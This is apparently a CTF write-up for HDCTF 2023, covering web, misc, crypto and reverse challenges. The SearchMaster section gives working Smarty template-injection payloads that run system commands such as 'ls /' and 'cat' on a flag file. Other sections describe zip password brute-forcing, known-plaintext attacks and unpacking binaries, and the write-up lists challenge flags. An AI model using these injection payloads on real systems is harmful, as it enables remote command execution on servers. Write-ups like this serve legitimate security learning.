WEB

SearchMaster

The hint mentions a template, so this is most likely template injection. First POST a data parameter with the values 1 and 2 as a test; the response returns 1 and 2.

Next, identify the template engine. dirsearch turns up a composer.json file, which shows that the site uses the Smarty template engine.

From here a quick Baidu search does the rest. Reference: 1. SSTI (template injection) vulnerabilities (introduction) - bmjoker - cnblogs (cnblogs.com)

Inject through {if}{/if}: data={if phpinfo()}{/if}

data={if system("ls /")}{/if}

data={if system("cat /flag_13_searchmaster")}{/if}

NSSCTF{bcf91779-06bb-4068-ae29-b35736ecbafe}

Welcome To HDCTF 2023

The challenge is a front-end game, so go straight to the JS file.

Further down there is a suspicious seeeeeeeecret, along with an alert. Run it directly in the browser console to get the flag.

NSSCTF{We13ome_t@_HDCTF_2o23}

MISC

hardMisc

1. Base64-decode the data at the end of the image

HDCTF{wE1c0w3_10_HDctf_M15c}

ExtremeMisc

Run binwalk on the file; foremost carves out an archive.

Extracting it gives Dic.zip; brute-force its password.

That yields Reverse.piz. Reversing each byte (swapping its two hex digits) gives a new archive.

s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
# swap each pair of adjacent characters in s
for i in range(0, len(s), 2):
    print(s[i+1:i+2] + s[i:i+1], end='')
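
An added example, not part of the original writeup: the per-byte swap above generalised into a helper that tries several byte-level transforms and reports which one restores a ZIP that parses. It assumes s in the script above is the hex dump of Reverse.piz; the transform list and the in-memory sample archive are constructed for illustration.

```python
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"  # local file header of a non-empty ZIP

def swap_nibbles(data: bytes) -> bytes:
    """Swap the two hex digits of every byte (0x05 -> 0x50)."""
    return bytes(((b << 4) & 0xF0) | (b >> 4) for b in data)

def reverse_bits(data: bytes) -> bytes:
    """Reverse the bit order inside every byte."""
    return bytes(int(f"{b:08b}"[::-1], 2) for b in data)

# Candidate obfuscations (assumed list), tried in insertion order.
TRANSFORMS = {
    "identity": lambda d: d,
    "swap_nibbles": swap_nibbles,
    "reverse_bits": reverse_bits,
    "reverse_bytes": lambda d: d[::-1],
    "reverse_bytes+swap_nibbles": lambda d: swap_nibbles(d[::-1]),
}

def recover_zip(blob: bytes):
    """Return (transform name, restored bytes), or None if nothing fits."""
    for name, fn in TRANSFORMS.items():
        candidate = fn(blob)
        if not candidate.startswith(ZIP_MAGIC):
            continue
        try:
            # Only parse the central directory: entries may be encrypted,
            # so do not extract or CRC-check them here.
            with zipfile.ZipFile(io.BytesIO(candidate)) as zf:
                zf.namelist()
        except zipfile.BadZipFile:
            continue
        return name, candidate
    return None

def make_sample() -> bytes:
    """Constructed stand-in for Reverse.piz: a tiny ZIP, nibble-swapped."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("flag.txt", "constructed sample, not the real flag")
    return swap_nibbles(buf.getvalue())
```

Calling recover_zip(open("Reverse.piz", "rb").read()) on the real file returns the transform name and the restored bytes, which can then be written out as a .zip.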

Brute-force the password

Known-plaintext attack

This yields the flag

HDCTF{u_a_a_master_@_c0mpRe553d_PaCKe1s}

Crypto

Normal_Rsa

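The challenge author slipped up and gave the flag away directly. I did not save the attachment and it has since been deleted.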

Reverse

easy_re

Opening the file in WinHex shows the UPX signature. Unpack it with UPX Shell, load it into IDA and look through the strings to get the flag.

I did not save the attachment, so this is only an outline of the approach.

fake_game

This is a packaged Python program, so follow the usual reversing workflow. First unpack it with pyinstxtractor.py.

This yields game and struct, but struct has no magic header. Take the header from any pyc inside base_library.zip and prepend it.

2. Decompile with uncompyle6

This gives game.py

Locate the part of the code that handles flag.txt

The logic to reverse: solve the equations to get xoor, then XOR it cyclically with the flag.

z3 solves the equations.

XORing with the recovered xoor directly gives a wrong result, because the precision of the computation is slightly off.

Changing the fourth value to 2361 fixes it.

HDCTF{G0Od_pl2y3r_f0r_Pvz!!}